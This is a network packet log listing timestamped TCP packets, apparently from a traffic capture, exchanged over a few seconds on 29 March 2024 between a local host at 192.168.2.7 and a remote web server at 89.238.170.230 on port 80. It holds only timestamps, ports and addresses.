Mar 29, 2024 14:24:54.203813076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.203871012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.203906059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.204035044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.204072952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.373810053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.373914003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.418252945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.418306112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.418323994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.418342113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.418343067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.418361902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.418361902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.418382883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.419203997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419218063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419259071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.419354916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419394970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.419605017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419622898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419651031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.419667006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.419722080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.419759035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.585263968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.585331917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.630235910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.630358934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.630628109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.630676985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.630697012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.630743027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.630913973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.630927086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.630960941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.630975962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.631048918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.631087065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.631094933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.631129980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.631531954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.631556034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.631567955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.631580114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.631589890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.631611109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.791263103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.791352987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.839723110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.839785099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840027094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840075970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840081930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840122938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840297937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840315104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840342999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840358019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840547085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840584040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.840591908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.840621948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.841032028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.841074944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.841080904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.841113091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.841167927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.841212988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.998524904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.998613119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.998732090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.998779058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.046895027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.046961069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.047312021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.047368050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.047415018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.047461033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.047597885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.047652960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.048727989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.048787117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.048799992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.048842907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.048845053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.048877954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.048883915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.048919916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.048959970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.049002886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.209938049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.210114002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.210150003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.210196018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.257642031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.257764101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.258862019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.258881092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.258914948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.258934975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.260251045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.260270119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.260294914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.260310888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.260320902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.260385036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.425141096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.425208092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.425252914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.425282001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.472503901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.472604990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.473606110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.473680019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.473690987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.473743916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.475119114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.475167036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.475246906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.475294113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.475338936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.475383043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.654098034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.654156923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.697319984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.697371006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.697386026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.697400093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.697731972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.697782993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.697949886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.697999954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.698910952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.698966026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.698987007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.699024916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.699244022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.699290037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.699299097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.699342012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.918734074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.918771029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.918786049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.918800116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.918895006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.918927908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.919111013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.919125080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.919166088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.919202089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.919907093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.919920921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.919997931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.920162916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.920229912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.920229912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.920269012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:55.920360088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.920378923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:55.920443058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.144854069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144874096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144887924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144906998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144918919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144932032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.144947052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.144977093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.145528078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.145548105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.145581007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.145607948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.145766973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.145802021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.145817041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.145840883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.145970106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.145987988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.146014929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.146034002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.376816034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376842976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376854897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376867056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376880884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376925945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.376928091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.376966000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.376995087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377036095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.377075911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377110958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.377141953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377177954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.377199888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377234936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.377249002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377285004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.377288103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.377326012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.587133884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.587153912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.587165117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.587229013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.587235928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.587276936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.588406086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588419914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588430882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588443041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588464975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.588500023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.588576078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588588953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588601112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588613033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.588619947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.588653088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.801388025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.801446915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.801554918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.801572084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.801585913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.801681995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.801681995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.802553892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.802572012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:56.802608013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.802627087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:56.823652029 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.035408020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075452089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075479984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075512886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075527906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075536966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075541973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075561047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075567007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075601101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075700045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075714111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075742006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075756073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075766087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075774908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.075797081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.075815916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.087548018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.087562084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.087615967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305022001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305052996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305078030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305135965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305172920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305196047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305239916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305258036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305299997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305807114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305851936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305880070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305901051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305917978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.305921078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305929899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.305963039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.315992117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.316082001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.316095114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.316133976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.316160917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.524472952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.524504900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.524518013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.524738073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.524835110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.524893045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.524914980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.524971008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.525499105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.525556087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.525557995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.525604010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.525618076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.525657892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.525697947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.525774002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.534161091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.534248114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.534296989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.534308910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.534377098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.741951942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.741976023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.741988897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742001057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742121935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.742619991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742635965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742682934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.742932081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742963076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.742983103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.743009090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.754961967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.754975080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.755016088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.755019903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.755038977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.755059004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.755085945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.969686985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969713926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969729900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969746113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969826937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.969861031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.969890118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969933033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969938040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.969950914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969969034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.969976902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.969996929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.970016956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.980031967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.980076075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.980093002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.980108023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.980108023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.980149031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.980186939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:57.980195045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:57.980237961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:58.188128948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:58.188235998 CET	49699	80	192.168.2.7	89.238.170.230
